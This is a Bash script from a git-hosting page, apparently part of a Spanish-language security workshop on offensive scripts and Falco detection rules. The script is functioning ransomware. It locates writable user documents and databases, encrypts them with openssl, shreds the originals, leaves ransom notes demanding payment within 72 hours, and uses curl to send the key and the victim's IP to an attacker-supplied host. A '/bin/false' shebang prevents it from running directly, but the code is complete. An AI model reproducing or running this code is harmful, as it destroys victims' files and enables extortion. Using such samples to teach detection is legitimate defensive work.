anti
ae0104b200
Scripts ofensivos (xargs, tarbulk, noxargs), C2 listener, Falco detection rules, slides md + pptx, y estructura del workshop.
61 lines
1.7 KiB
Bash
61 lines
1.7 KiB
Bash
#!/bin/false
|
|
# /bin/false porque no quiero ejecutar esto :)
|
|
|
|
IP=$1
|
|
KEY=$(openssl rand -hex 32)
|
|
|
|
function get_writeable_dirs() {
|
|
WRITEABLE_DIRS=()
|
|
while IFS= read -r dir; do
|
|
WRITEABLE_DIRS+=("$dir")
|
|
done < <(find / -type d -perm -0002)
|
|
}
|
|
|
|
function get_interesting_files() {
|
|
TARGETS=()
|
|
while IFS= read -r file; do
|
|
TARGETS+=("$file")
|
|
done < <(find / -type f -writable \( -name "*.txt" -o -name "*.pdf" -o -name "*.docx" -o -name "*.db" \))
|
|
}
|
|
|
|
function send_key() {
|
|
curl -sk "https://$IP/?k=$KEY&v=$(curl -s4 ifconfig.me)"
|
|
}
|
|
|
|
function make_readme() {
|
|
for dir in "${WRITEABLE_DIRS[@]}"; do
|
|
echo "Tus archivos han sido cifrados. Tienes 72 horas para pagar." > "$dir/LEEME_URGENTE.txt"
|
|
done
|
|
}
|
|
|
|
function encrypt() {
|
|
for file in "${TARGETS[@]}"; do
|
|
openssl enc -aes-256-cbc -pbkdf2 -pass pass:"$KEY" -in "$file" -out "$file.enc"
|
|
shred -u "$file"
|
|
done
|
|
}
|
|
|
|
function main() {
|
|
echo "[*] Reconocimiento: directorios escribibles..."
|
|
time get_writeable_dirs
|
|
echo "[+] ${#WRITEABLE_DIRS[@]} directorios encontrados."
|
|
|
|
echo "[*] Reconocimiento: archivos objetivo..."
|
|
time get_interesting_files
|
|
echo "[+] ${#TARGETS[@]} archivos encontrados."
|
|
|
|
echo "[*] Cifrando (for loop, secuencial)..."
|
|
time encrypt
|
|
echo "[+] Cifrado completo."
|
|
|
|
echo "[*] Depositando notas de rescate..."
|
|
time make_readme
|
|
echo "[+] Notas en ${#WRITEABLE_DIRS[@]} directorios."
|
|
|
|
echo "[*] Exfiltrando clave a $IP..."
|
|
send_key
|
|
echo "[+] Hecho."
|
|
}
|
|
|
|
main "$@"
|